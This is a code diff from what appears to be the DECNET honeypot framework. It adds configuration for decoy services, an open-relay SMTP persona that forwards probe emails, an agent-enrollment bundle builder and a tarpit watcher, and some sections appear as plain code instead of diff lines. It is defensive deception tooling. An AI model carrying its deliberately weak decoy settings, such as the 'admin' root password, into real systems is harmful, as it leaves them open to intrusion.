ccdced01..c3c45ce2 100644 --- a/decnet/services/rdp.py +++ b/decnet/services/rdp.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = 
Path(__file__).parent.parent / "templates" / "rdp" @@ -9,6 +9,19 @@ class RDPService(BaseService): ports = [3389] default_image = "build" + config_schema = [ + ServiceConfigField( + key="nla", + label="Enable CredSSP / NLA", + type="bool", + default=False, + help=( + "Off by default — basic X.224 cookie capture is enough for most " + "attacker traffic and avoids the openssl cert-gen at container start." + ), + ), + ] + def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { "build": {"context": str(TEMPLATES_DIR)}, diff --git a/decnet/services/redis.py b/decnet/services/redis.py index b6c9b5c9..36ddec76 100644 --- a/decnet/services/redis.py +++ b/decnet/services/redis.py @@ -1,5 +1,5 @@ from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis" @@ -9,6 +9,23 @@ class RedisService(BaseService): ports = [6379] default_image = "build" + config_schema = [ + ServiceConfigField( + key="version", + label="Advertised Redis version", + type="string", + placeholder="7.2.4", + help="Reported by INFO server -> redis_version.", + ), + ServiceConfigField( + key="os_string", + label="Advertised OS string", + type="string", + placeholder="Linux 5.15.0 x86_64", + help="Reported by INFO server -> os.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/registry.py b/decnet/services/registry.py index 297335fd..f2c08623 100644 --- a/decnet/services/registry.py +++ b/decnet/services/registry.py @@ -28,7 +28,7 @@ def _load_plugins() -> None: for cls in BaseService.__subclasses__(): if not cls.__module__.startswith("decnet.services."): continue - instance = cls() + instance = cls() # type: ignore[abstract] _registry[instance.name] = instance _loaded = True diff --git a/decnet/services/sip.py b/decnet/services/sip.py index 
05665396..27eb5c5d 100644 --- a/decnet/services/sip.py +++ b/decnet/services/sip.py @@ -8,6 +8,7 @@ class SIPService(BaseService): name = "sip" ports = [5060] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/smb.py b/decnet/services/smb.py index f6a43caa..ae7ea185 100644 --- a/decnet/services/smb.py +++ b/decnet/services/smb.py @@ -8,6 +8,7 @@ class SMBService(BaseService): name = "smb" ports = [445, 139] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/smtp.py b/decnet/services/smtp.py index b2005ab7..266e4f47 100644 --- a/decnet/services/smtp.py +++ b/decnet/services/smtp.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp" ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") @@ -16,6 +16,24 @@ class SMTPService(BaseService): ports = [25, 587] default_image = "build" + config_schema = [ + ServiceConfigField( + key="banner", + label="SMTP greeting banner", + type="string", + placeholder="mail.corp.local ESMTP Postfix", + help="First line returned on TCP connect (220 ...).", + ), + ServiceConfigField( + key="mta", + label="MTA persona", + type="enum", + enum=["postfix", "exim", "sendmail"], + default="postfix", + help="Shapes EHLO capability list and error wording.", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/smtp_relay.py 
# User-tunable fields for the open-relay SMTP persona.
# The first two entries mirror the plain smtp service; the upstream_* fields
# describe the real relay used to forward probe emails.
config_schema = [
    ServiceConfigField(
        key="banner",
        label="SMTP greeting banner",
        type="string",
        placeholder="mail.corp.local ESMTP Postfix",
        help="First line returned on TCP connect (220 ...).",
    ),
    ServiceConfigField(
        key="mta",
        label="MTA persona",
        type="enum",
        enum=["postfix", "exim", "sendmail"],
        default="postfix",
        help="Shapes EHLO capability list and error wording.",
    ),
    ServiceConfigField(
        key="upstream_host",
        label="Upstream relay host",
        type="string",
        placeholder="smtp.sendgrid.net",
        help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.",
    ),
    ServiceConfigField(
        key="upstream_port",
        label="Upstream relay port",
        type="int",
        default=25,
        help="Port on the upstream relay (25 or 587).",
    ),
    ServiceConfigField(
        key="upstream_user",
        label="Upstream relay username",
        type="string",
        help="AUTH username for the upstream relay (optional).",
    ),
    # This is a real credential for a real relay: declare it as a secret
    # password field, the same way the ssh/telnet "password" fields are
    # declared, rather than as a plain string.
    ServiceConfigField(
        key="upstream_pass",
        label="Upstream relay password",
        type="password",
        secret=True,
        help="AUTH password for the upstream relay (optional).",
    ),
    ServiceConfigField(
        key="upstream_sender",
        label="Upstream envelope sender",
        type="string",
        placeholder="probe@yourdomain.com",
        help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.",
    ),
    ServiceConfigField(
        key="probe_limit",
        label="Probe forward limit",
        type="int",
        default=1,
        help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.",
    ),
]
SSHService(BaseService): ports = [22] default_image = "build" + config_schema = [ + ServiceConfigField( + key="password", + label="Root password", + type="password", + default="admin", + secret=True, + help="Plaintext root password for the in-container sshd.", + ), + ServiceConfigField( + key="hostname", + label="Container hostname", + type="string", + help=( + "Cosmetic override for the SSH banner/PS1 — keeps the decoy " + "looking heterogeneous. Decky identity (NODE_NAME) is unaffected." + ), + placeholder="e.g. mail-01.corp.local", + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/telnet.py b/decnet/services/telnet.py index 6bb03a2d..6ffef68c 100644 --- a/decnet/services/telnet.py +++ b/decnet/services/telnet.py @@ -1,7 +1,7 @@ import os from pathlib import Path -from decnet.services.base import BaseService +from decnet.services.base import BaseService, ServiceConfigField TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet" ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts") @@ -24,6 +24,27 @@ class TelnetService(BaseService): ports = [23] default_image = "build" + config_schema = [ + ServiceConfigField( + key="password", + label="Root password", + type="password", + default="admin", + secret=True, + help="Plaintext root password for the in-container telnetd.", + ), + ServiceConfigField( + key="hostname", + label="Container hostname", + type="string", + placeholder="e.g. mail-01.corp.local", + help=( + "Cosmetic override for the telnet banner — keeps decoys " + "looking heterogeneous. Decky identity (NODE_NAME) is unaffected." 
+ ), + ), + ] + def compose_fragment( self, decky_name: str, diff --git a/decnet/services/tftp.py b/decnet/services/tftp.py index a51ba7fc..75cbd94f 100644 --- a/decnet/services/tftp.py +++ b/decnet/services/tftp.py @@ -8,6 +8,7 @@ class TFTPService(BaseService): name = "tftp" ports = [69] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/services/vnc.py b/decnet/services/vnc.py index 0c5834e2..239765be 100644 --- a/decnet/services/vnc.py +++ b/decnet/services/vnc.py @@ -8,6 +8,7 @@ class VNCService(BaseService): name = "vnc" ports = [5900] default_image = "build" + # config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict: fragment: dict = { diff --git a/decnet/swarm/bundle_builder.py b/decnet/swarm/bundle_builder.py new file mode 100644 index 00000000..bda76d4c --- /dev/null +++ b/decnet/swarm/bundle_builder.py @@ -0,0 +1,209 @@ +"""Tarball + bootstrap construction for agent-enrollment bundles. + +Pure I/O, no FastAPI dependency — independently testable. +""" +from __future__ import annotations + +import io +import os +import pathlib +import tarfile +from datetime import datetime, timezone +from typing import Optional + +from decnet.swarm import pki + +# --------------------------------------------------------------------------- +# Include / exclude manifest +# --------------------------------------------------------------------------- + +# Explicit include list — fails closed. Stray files on the master +# (dev venvs, .env files, editor scratch) cannot leak into the bundle. +_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",) +_INCLUDED_DIRS: tuple[str, ...] 
= ("decnet",) + +# Subtrees of _INCLUDED_DIRS that must NOT ship (relative to repo root). +# * decnet/web — FastAPI master app, unused on agents. +# * decnet/mutator — swarm-wide respawn scheduler, master-only. +# * decnet/profiler — rebuilds profiles against master DB, master-only. +_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({ + "decnet/web", + "decnet/mutator", + "decnet/profiler", +}) + +# Agent-side systemd units. Profiler stays master-side intentionally. +_SYSTEMD_UNITS = ( + "decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater", + "decnet-collector", "decnet-prober", "decnet-sniffer", +) + + +# --------------------------------------------------------------------------- +# Path helpers +# --------------------------------------------------------------------------- + +def _repo_root() -> pathlib.Path: + # decnet/swarm/bundle_builder.py -> parents[2] = repo root. + return pathlib.Path(__file__).resolve().parents[2] + + +def _templates_dir() -> pathlib.Path: + return pathlib.Path(__file__).resolve().parents[1] / "web" / "templates" + + +# --------------------------------------------------------------------------- +# Filesystem walk +# --------------------------------------------------------------------------- + +def _iter_included(root: pathlib.Path) -> list[tuple[pathlib.Path, str]]: + """Return ``(full_path, arcname)`` pairs for every file the agent needs. + + Walk is pruned in-place: ``__pycache__`` and master-only subtrees are + skipped at directory level so we never descend into them. 
+ """ + found: list[tuple[pathlib.Path, str]] = [] + + for rel in _INCLUDED_ROOT_FILES: + p = root / rel + if p.is_file(): + found.append((p, rel)) + + for top in _INCLUDED_DIRS: + start = root / top + if not start.is_dir(): + continue + for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False): + dir_path = pathlib.Path(dirpath) + rel_dir = dir_path.relative_to(root).as_posix() + + dirnames[:] = [ + d for d in dirnames + if d != "__pycache__" + and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES + ] + + for fn in filenames: + if fn.endswith((".pyc", ".pyo")): + continue + full = dir_path / fn + if full.is_symlink(): + continue + found.append((full, f"{rel_dir}/{fn}")) + + found.sort(key=lambda t: t[1]) + return found + + +# --------------------------------------------------------------------------- +# Content renderers +# --------------------------------------------------------------------------- + +def _render_decnet_ini( + master_host: str, + host_uuid: str, + use_ipvlan: bool = False, + swarmctl_port: int = 8770, +) -> bytes: + ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n" + return ( + "; Generated by DECNET agent-enrollment bundle.\n" + "[decnet]\n" + "mode = agent\n" + "disallow-master = true\n" + "log-directory = /var/log/decnet\n" + f"{ipvlan_line}" + "\n" + "[agent]\n" + f"master-host = {master_host}\n" + f"swarmctl-port = {swarmctl_port}\n" + "swarm-syslog-port = 6514\n" + "agent-port = 8765\n" + "agent-dir = /etc/decnet/agent\n" + "updater-dir = /etc/decnet/updater\n" + f"host-uuid = {host_uuid}\n" + ).encode() + + +def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None: + info = tarfile.TarInfo(name) + info.size = len(data) + info.mode = mode + info.mtime = int(datetime.now(timezone.utc).timestamp()) + tar.addfile(info, io.BytesIO(data)) + + +def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes: + tpl_path = _templates_dir() / f"{name}.service.j2" + 
def build_tarball(
    master_host: str,
    agent_name: str,
    host_uuid: str,
    issued: pki.IssuedCert,
    services_ini: Optional[str],
    updater_issued: Optional[pki.IssuedCert] = None,
    use_ipvlan: bool = False,
) -> bytes:
    """Assemble the gzipped enrollment tarball for one agent and return its bytes.

    Entries are written in this order: the source files selected by
    ``_iter_included``, the rendered ``decnet.ini``, one systemd unit per name
    in ``_SYSTEMD_UNITS``, the agent CA/cert/key, the updater CA/cert/key
    (only when ``updater_issued`` is given) and ``services.ini`` (only when
    ``services_ini`` is non-empty). Private keys are stored with mode 0o600.
    """
    archive = io.BytesIO()
    repo = _repo_root()

    with tarfile.open(fileobj=archive, mode="w:gz") as tar:
        # Source tree: each path is added individually, never recursively.
        for src_path, arc in _iter_included(repo):
            tar.add(src_path, arcname=arc, recursive=False)

        # Generated configuration.
        ini_bytes = _render_decnet_ini(master_host, host_uuid, use_ipvlan)
        _add_bytes(tar, "etc/decnet/decnet.ini", ini_bytes)

        for unit_name in _SYSTEMD_UNITS:
            unit_bytes = _render_systemd_unit(unit_name, agent_name, master_host)
            _add_bytes(tar, f"etc/systemd/system/{unit_name}.service", unit_bytes)

        # Certificate material as (archive name, payload, file mode).
        cert_entries = [
            ("home/.decnet/agent/ca.crt", issued.ca_cert_pem, 0o644),
            ("home/.decnet/agent/worker.crt", issued.cert_pem, 0o644),
            ("home/.decnet/agent/worker.key", issued.key_pem, 0o600),
        ]
        if updater_issued is not None:
            cert_entries += [
                ("home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem, 0o644),
                ("home/.decnet/updater/updater.crt", updater_issued.cert_pem, 0o644),
                ("home/.decnet/updater/updater.key", updater_issued.key_pem, 0o600),
            ]
        for entry_name, payload, file_mode in cert_entries:
            _add_bytes(tar, entry_name, payload, mode=file_mode)

        if services_ini:
            _add_bytes(tar, "services.ini", services_ini.encode())

    # Read the buffer only after the context manager has closed the archive.
    return archive.getvalue()
+""" +from __future__ import annotations + +import asyncio +import json +import socket +from datetime import datetime, timezone +from typing import Any, Optional + +from decnet.decky_io.resolve import resolve_decky_container +from decnet.logging import get_logger +from decnet.network import get_container_pid +from decnet.web.db.repository import BaseRepository + +log = get_logger("tarpit.watcher") + +_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL" +_DEFAULT_POLL_S = 15 + +_TCP_ESTABLISHED = "01" + + +def _read_proc_net_tcp(pid: int) -> str: + """Read /proc/{pid}/net/tcp from the host (namespace-aware symlink).""" + path = f"/proc/{pid}/net/tcp" + try: + with open(path) as f: + return f.read() + except OSError: + return "" + + +def _parse_connections(content: str, target_port: int) -> list[str]: + """Return list of remote IPs in ESTABLISHED state on target_port.""" + ips: list[str] = [] + for line in content.strip().splitlines()[1:]: + parts = line.split() + if len(parts) < 4: + continue + local_hex, rem_hex, state = parts[1], parts[2], parts[3] + if state != _TCP_ESTABLISHED: + continue + local_port = int(local_hex.split(":")[1], 16) + if local_port != target_port: + continue + rem_ip_hex = rem_hex.split(":")[0] + try: + ip_bytes = bytes.fromhex(rem_ip_hex)[::-1] + ip = socket.inet_ntoa(ip_bytes) + except (ValueError, OSError): + continue + if ip != "0.0.0.0": # nosec B104 + ips.append(ip) + return ips + + +def _get_poll_interval() -> int: + import os + try: + return int(os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S)) + except (TypeError, ValueError): + return _DEFAULT_POLL_S + + +async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]: + try: + from decnet.web.db.models import Attacker + from sqlalchemy import select + async with repo._session() as session: # type: ignore[attr-defined] + result = await session.execute( + select(Attacker).where(Attacker.ip == ip) # type: ignore[arg-type] + ) + row = result.scalar_one_or_none() + return 
async def _tick(
    repo: BaseRepository,
    seen: dict[tuple[str, str, int], datetime],
) -> None:
    """Run one poll: emit ``tarpit_enter`` / ``tarpit_exit`` for connection changes.

    For every active rule the decky's container PID is looked up, its TCP
    table is read, and each connection on a tarpitted port becomes a
    ``(decky_name, src_ip, port)`` key. Keys not yet in ``seen`` produce a
    ``tarpit_enter`` event; keys in ``seen`` that are no longer observed
    produce a ``tarpit_exit`` event carrying the elapsed seconds.

    Args:
        repo: Repository used to list rules and persist log rows.
        seen: Connection key -> first-seen timestamp. Mutated in place and
            carried between ticks by the caller.

    A rule whose key is malformed or whose container cannot be resolved is
    skipped; it does not stop the remaining rules from being processed.
    """
    rules = await repo.list_tarpit_rules()
    if not rules:
        # No active tarpit rules — clear stale seen state and bail early.
        seen.clear()
        return

    current: set[tuple[str, str, int]] = set()

    for rule in rules:
        db_key: str = rule["decky_name"]
        ports: list[int] = rule["ports"]

        # Topology deckies are stored as "t:{topology_id}:{decky_name}".
        # Resolve the real container name before asking Docker for its PID.
        if db_key.startswith("t:"):
            try:
                _, topology_id, decky_name = db_key.split(":", 2)
            except ValueError:
                # Fewer than three ':'-separated parts. Skip just this rule;
                # letting the error escape would drop every later rule and
                # the exit pass for this tick.
                log.debug("tarpit watcher: malformed topology rule key %r", db_key)
                continue
            try:
                container = await resolve_decky_container(
                    repo, decky_name, topology_id=topology_id,
                )
            except LookupError as exc:
                log.debug("tarpit watcher: %s", exc)
                continue
        else:
            decky_name = db_key
            container = db_key

        try:
            pid = await asyncio.to_thread(get_container_pid, container)
        except LookupError as exc:
            log.debug("tarpit watcher: %s", exc)
            continue

        # The file read is blocking, so keep it off the event loop.
        tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid)

        for port in ports:
            for src_ip in _parse_connections(tcp_content, port):
                key = (decky_name, src_ip, port)
                current.add(key)
                if key not in seen:
                    seen[key] = datetime.now(timezone.utc)
                    log.info(
                        "tarpit enter decky=%s src=%s port=%d",
                        decky_name, src_ip, port,
                    )
                    await _emit_log(
                        repo,
                        event_type="tarpit_enter",
                        decky_name=decky_name,
                        src_ip=src_ip,
                        port=port,
                    )

    # Anything remembered from earlier ticks but not observed now has left.
    # Iterate over a copy because entries are popped while looping.
    for key in list(seen):
        if key not in current:
            first_seen = seen.pop(key)
            elapsed = int((datetime.now(timezone.utc) - first_seen).total_seconds())
            decky_name, src_ip, port = key
            log.info(
                "tarpit exit decky=%s src=%s port=%d elapsed=%ds",
                decky_name, src_ip, port, elapsed,
            )
            await _emit_log(
                repo,
                event_type="tarpit_exit",
                decky_name=decky_name,
                src_ip=src_ip,
                port=port,
                extra={"duration_s": elapsed},
            )
Usage:: @@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any: # Called as @traced (no arguments) return _wrap(fn, None) # Fallback: @traced() with no args - def decorator(f: F) -> F: + def _fallback_decorator(f: F) -> F: return _wrap(f, name) - return decorator + return _fallback_decorator def _wrap(fn: F, span_name: str | None) -> F: diff --git a/decnet/templates/_shared/ntlmssp.py b/decnet/templates/_shared/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/_shared/ntlmssp.py +++ b/decnet/templates/_shared/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/conpot/entrypoint.py b/decnet/templates/conpot/entrypoint.py index 59b9b99b..891910d5 100644 --- a/decnet/templates/conpot/entrypoint.py +++ b/decnet/templates/conpot/entrypoint.py @@ -128,6 +128,9 @@ def main(): signal.signal(signal.SIGINT, _forward) try: + if proc.stdout is None: + proc.wait() + return for raw_line in proc.stdout: line = raw_line.rstrip() if not line: diff --git a/decnet/templates/conpot/syslog_bridge.py b/decnet/templates/conpot/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/conpot/syslog_bridge.py +++ b/decnet/templates/conpot/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/docker_api/syslog_bridge.py b/decnet/templates/docker_api/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/docker_api/syslog_bridge.py +++ b/decnet/templates/docker_api/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/elasticsearch/server.py b/decnet/templates/elasticsearch/server.py index 7d2b0d75..6f18c48d 100644 --- a/decnet/templates/elasticsearch/server.py +++ b/decnet/templates/elasticsearch/server.py @@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler): server_version = "elasticsearch" sys_version = "" - def _send_json(self, code: int, data: dict) -> None: + def _send_json(self, code: int, data: dict | list) -> None: body = json.dumps(data).encode() self.send_response(code) self.send_header("Content-Type", "application/json; charset=UTF-8") diff --git a/decnet/templates/elasticsearch/syslog_bridge.py b/decnet/templates/elasticsearch/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- 
a/decnet/templates/elasticsearch/syslog_bridge.py +++ b/decnet/templates/elasticsearch/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ftp/server.py b/decnet/templates/ftp/server.py index b03637d4..c2f9ed09 100644 --- a/decnet/templates/ftp/server.py +++ b/decnet/templates/ftp/server.py @@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set. import os from pathlib import Path +from typing import cast from twisted.internet import defer, reactor +from twisted.internet.interfaces import IReactorTCP from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell +from twisted.python.failure import Failure from twisted.python.filepath import FilePath from twisted.python import log as twisted_log @@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs() class ServerFTP(FTP): def connectionMade(self): - peer = self.transport.getPeer() + assert self.transport is not None + peer = self.transport.getPeer() # type: ignore[misc] _log("connection", src_ip=peer.host, src_port=peer.port) super().connectionMade() @@ -120,15 +124,16 @@ class ServerFTP(FTP): return defer.succeed((530, "Login incorrect.")) self.state = self.AUTHED self._user = getattr(self, "_server_user", "anonymous") - self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) + self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment] return defer.succeed((230, "Login successful.")) def ftp_RETR(self, path): _log("download_attempt", path=path) return super().ftp_RETR(path) - 
def connectionLost(self, reason): - peer = self.transport.getPeer() + def connectionLost(self, reason: Failure) -> None: # type: ignore[override] + assert self.transport is not None + peer = self.transport.getPeer() # type: ignore[misc] _log("disconnect", src_ip=peer.host, src_port=peer.port) super().connectionLost(reason) @@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory): if __name__ == "__main__": twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False) _log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}") - reactor.listenTCP(PORT, ServerFTPFactory()) - reactor.run() + cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type] + reactor.run() # type: ignore[attr-defined] diff --git a/decnet/templates/ftp/syslog_bridge.py b/decnet/templates/ftp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ftp/syslog_bridge.py +++ b/decnet/templates/ftp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/http/syslog_bridge.py b/decnet/templates/http/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/http/syslog_bridge.py +++ b/decnet/templates/http/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/https/entrypoint.sh b/decnet/templates/https/entrypoint.sh index 43019223..f88a889e 100644 --- a/decnet/templates/https/entrypoint.sh +++ b/decnet/templates/https/entrypoint.sh @@ -2,12 +2,28 @@ set -e TLS_DIR="/opt/tls" -CERT="${TLS_CERT:-$TLS_DIR/cert.pem}" -KEY="${TLS_KEY:-$TLS_DIR/key.pem}" +mkdir -p "$TLS_DIR" + +# TLS_CERT/TLS_KEY may arrive as either a host-side path OR raw PEM +# content (the wizard ships PEM textareas as decoded strings). Detect by +# looking for a PEM header; if present, write to disk and rebind the var +# to the on-disk path. +if [ -n "$TLS_CERT" ] && printf '%s' "$TLS_CERT" | grep -q 'BEGIN '; then + printf '%s' "$TLS_CERT" > "$TLS_DIR/cert.pem" + CERT="$TLS_DIR/cert.pem" +else + CERT="${TLS_CERT:-$TLS_DIR/cert.pem}" +fi +if [ -n "$TLS_KEY" ] && printf '%s' "$TLS_KEY" | grep -q 'BEGIN '; then + printf '%s' "$TLS_KEY" > "$TLS_DIR/key.pem" + chmod 600 "$TLS_DIR/key.pem" + KEY="$TLS_DIR/key.pem" +else + KEY="${TLS_KEY:-$TLS_DIR/key.pem}" +fi # Generate a self-signed certificate if none exists if [ ! -f "$CERT" ] || [ ! -f "$KEY" ]; then - mkdir -p "$TLS_DIR" CN="${TLS_CN:-${NODE_NAME:-localhost}}" openssl req -x509 -newkey rsa:2048 -nodes \ -keyout "$KEY" -out "$CERT" \ @@ -15,4 +31,8 @@ if [ ! -f "$CERT" ] || [ ! -f "$KEY" ]; then 2>/dev/null fi +# server.py reads TLS_CERT/TLS_KEY as filesystem paths. 
+export TLS_CERT="$CERT" +export TLS_KEY="$KEY" + exec python3 /opt/server.py diff --git a/decnet/templates/https/syslog_bridge.py b/decnet/templates/https/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/https/syslog_bridge.py +++ b/decnet/templates/https/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/imap/server.py b/decnet/templates/imap/server.py index 02e19164..7546557f 100644 --- a/decnet/templates/imap/server.py +++ b/decnet/templates/imap/server.py @@ -17,6 +17,7 @@ import os import time from email.utils import getaddresses from pathlib import Path +from typing import cast from syslog_bridge import ( SEVERITY_WARNING, encode_secret, @@ -377,7 +378,7 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: def _parse_seq_range(range_str: str, total: int) -> list[int]: """Parse IMAP sequence set ('1', '1:3', '1:*', '*') → list of 1-based indices.""" - result = [] + result: list[int] = [] for part in range_str.split(","): part = part.strip() if ":" in part: @@ -472,6 +473,9 @@ def _build_fetch_response(seq: int, msg: dict, items: list[str]) -> bytes: # ── Protocol ────────────────────────────────────────────────────────────────── class IMAPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -479,12 +483,12 @@ class IMAPProtocol(asyncio.Protocol): self._state = "NOT_AUTHENTICATED" 
self._selected = None # mailbox name currently selected - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) banner = IMAP_BANNER if IMAP_BANNER.endswith("\r\n") else IMAP_BANNER + "\r\n" - transport.write(banner.encode()) + self._transport.write(banner.encode()) def data_received(self, data): self._buf += data @@ -519,6 +523,7 @@ class IMAPProtocol(asyncio.Protocol): elif cmd == "LOGOUT": self._w(b"* BYE Logging out\r\n") self._w(f"{tag} OK LOGOUT completed\r\n") + assert self._transport is not None self._transport.close() # NOT_AUTHENTICATED only @@ -638,6 +643,7 @@ class IMAPProtocol(asyncio.Protocol): if use_uid and "UID" not in items: items = ["UID"] + items + assert self._transport is not None for seq in indices: if 1 <= seq <= total: self._transport.write(_build_fetch_response(seq, emails[seq - 1], items)) @@ -662,6 +668,7 @@ class IMAPProtocol(asyncio.Protocol): # ── Helpers ─────────────────────────────────────────────────────────────── def _w(self, data: str | bytes) -> None: + assert self._transport is not None if isinstance(data, str): data = data.encode() self._transport.write(data) diff --git a/decnet/templates/imap/syslog_bridge.py b/decnet/templates/imap/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/imap/syslog_bridge.py +++ b/decnet/templates/imap/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
